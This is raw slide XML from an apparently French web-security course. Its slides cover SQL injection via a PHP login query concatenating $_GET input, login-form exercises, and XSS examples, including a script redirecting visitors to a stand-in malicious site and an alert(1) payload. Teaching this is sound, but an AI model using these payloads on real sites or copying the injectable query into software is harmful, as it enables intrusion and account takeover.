              <a:t> = "SELECT * FROM USERS WHERE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>username</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t> = '".$_GET['</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>username</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>']."' AND </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>password</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t> = '".$_GET['</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>password</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>']."' LIMIT 1;";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buClr>
                <a:srgbClr val="0070C0"/>
              </a:buClr>
              <a:buSzPct val="150000"/>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buClr>
                <a:srgbClr val="0070C0"/>
              </a:buClr>
              <a:buSzPct val="150000"/>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Le pirate lance la requête via le bouton de connexion.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buClr>
                <a:srgbClr val="0070C0"/>
              </a:buClr>
              <a:buSzPct val="150000"/>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buClr>
                <a:srgbClr val="0070C0"/>
              </a:buClr>
              <a:buSzPct val="150000"/>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>La requête s’exécute, le pirate est authentifié en tant qu’admin et a accès sans restriction au site.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Espace réservé du numéro de diapositive 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4BDEA748-B1D8-4595-A264-6E7962D6A97B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{C3DB2ADC-AF19-4574-8C10-79B5B04FCA27}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>71</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="149010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51326B-60A2-489D-862A-6F1F0131AAEA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Failles communes – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>injection SQL Serveur – Exercice Python</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Espace réservé du contenu 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{41AD1046-8256-4DAB-A442-025A3A47D4BC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="304801" y="2293126"/>
            <a:ext cx="11482934" cy="3636088"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t># Créer une fonction qui retourne si l'utilisateur est admin ou non</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>En allant chercher l'information en base de donnée</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Espace réservé du numéro de diapositive 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4BDEA748-B1D8-4595-A264-6E7962D6A97B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{C3DB2ADC-AF19-4574-8C10-79B5B04FCA27}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>72</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="58126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51326B-60A2-489D-862A-6F1F0131AAEA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Failles communes – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>injection SQL Serveur – Exercice PHP</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Espace réservé du contenu 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{41AD1046-8256-4DAB-A442-025A3A47D4BC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="304801" y="2293126"/>
            <a:ext cx="11482934" cy="3636088"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0"/>
              <a:t>Construire un formulaire d’identification de la manière la plus simple possible, mais bien sûr fonctionnelle</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Si pas déjà fait : installez Apache MySQL et PHP sur votre machine (avec par exemple WAMP)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Créez une base de données avec une table ‘user’ avec un enregistrement</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Créez une page, contenant :</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>un formulaire d’identification</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>une requête à la base de données pour vérifier si le couple login/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>pwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> existe</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>retourne un résultat « utilisateur reconnu / non reconnu »</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Espace réservé du numéro de diapositive 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4BDEA748-B1D8-4595-A264-6E7962D6A97B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{C3DB2ADC-AF19-4574-8C10-79B5B04FCA27}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>73</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="392861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51326B-60A2-489D-862A-6F1F0131AAEA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Failles communes – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>exemple Cross-site Scripting</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="fr-FR" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Espace réservé du contenu 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{41AD1046-8256-4DAB-A442-025A3A47D4BC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="353569" y="2293126"/>
            <a:ext cx="11385398" cy="3636088"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:buClr>
                <a:srgbClr val="0070C0"/>
              </a:buClr>
              <a:buSzPct val="150000"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Injecter du code client tel que du Javascript ou même de l’HTML dans une ressource distante</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:srgbClr val="0070C0"/>
              </a:buClr>
              <a:buSzPct val="150000"/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:srgbClr val="0070C0"/>
              </a:buClr>
              <a:buSzPct val="150000"/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Persistant : Le code injecté va être stocké dans une base de données</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="fr-FR" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>(la base de données utilisée par l’application).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:srgbClr val="0070C0"/>
              </a:buClr>
              <a:buSzPct val="150000"/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:srgbClr val="0070C0"/>
              </a:buClr>
              <a:buSzPct val="150000"/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Non persistant : Le code ne sera pas stocké et ne pourra être réutilisé que si la personne malveillante le réinjecte sur un site (Article posté par un Utilisateur).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Espace réservé du numéro de diapositive 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4BDEA748-B1D8-4595-A264-6E7962D6A97B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{C3DB2ADC-AF19-4574-8C10-79B5B04FCA27}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>74</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="404285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51326B-60A2-489D-862A-6F1F0131AAEA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Failles communes – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>exemple Cross-site Scripting</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="fr-FR" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Espace réservé du contenu 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{41AD1046-8256-4DAB-A442-025A3A47D4BC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="304801" y="2293126"/>
            <a:ext cx="11482934" cy="3636088"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buClr>
                <a:srgbClr val="0070C0"/>
              </a:buClr>
              <a:buSzPct val="150000"/>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Au lieu d’écrire le champ de saisie de l’article, le pirate saisit dans le champ texte le code suivant : </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:buClr>
                <a:srgbClr val="0070C0"/>
              </a:buClr>
              <a:buSzPct val="150000"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;script&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>document.location</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>="http://www.monSiteMalveillant.com" &lt;/script&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buClr>
                <a:srgbClr val="0070C0"/>
              </a:buClr>
              <a:buSzPct val="150000"/>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buClr>
                <a:srgbClr val="0070C0"/>
              </a:buClr>
              <a:buSzPct val="150000"/>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod" startAt="2"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Le pirate poste l’article.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buClr>
                <a:srgbClr val="0070C0"/>
              </a:buClr>
              <a:buSzPct val="150000"/>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod" startAt="2"/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buClr>
                <a:srgbClr val="0070C0"/>
              </a:buClr>
              <a:buSzPct val="150000"/>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod" startAt="2"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Lorsqu’un utilisateur consultera la page de l’article, le code s’exécutera et un Utilisateur du site sera redirigé sur l’adresse.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Espace réservé du numéro de diapositive 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4BDEA748-B1D8-4595-A264-6E7962D6A97B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{C3DB2ADC-AF19-4574-8C10-79B5B04FCA27}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>75</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="77505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51326B-60A2-489D-862A-6F1F0131AAEA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Failles communes – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>exemple Cross-site Scripting</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="fr-FR" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Espace réservé du contenu 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{41AD1046-8256-4DAB-A442-025A3A47D4BC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="304801" y="2293126"/>
            <a:ext cx="11482934" cy="3636088"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buClr>
                <a:srgbClr val="0070C0"/>
              </a:buClr>
              <a:buSzPct val="150000"/>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Dans la barre de recherche, le pirate saisit par exemple : </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:buClr>
                <a:srgbClr val="0070C0"/>
              </a:buClr>
              <a:buSzPct val="150000"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;script&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>alert</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(1);&lt;/script&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buClr>
                <a:srgbClr val="0070C0"/>
              </a:buClr>
              <a:buSzPct val="150000"/>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buClr>
                <a:srgbClr val="0070C0"/>
              </a:buClr>
              <a:buSzPct val="150000"/>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod" startAt="2"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Le pirate lance la recherche.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buClr>
                <a:srgbClr val="0070C0"/>
              </a:buClr>
              <a:buSzPct val="150000"/>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod" startAt="2"/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buClr>
                <a:srgbClr val="0070C0"/>
              </a:buClr>
              <a:buSzPct val="150000"/>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod" startAt="2"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>L’alerte affichant, par exemple, une pop-up avec comme contenu « 1 » apparait sur l’écran.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Espace réservé du numéro de diapositive 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4BDEA748-B1D8-4595-A264-6E7962D6A97B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
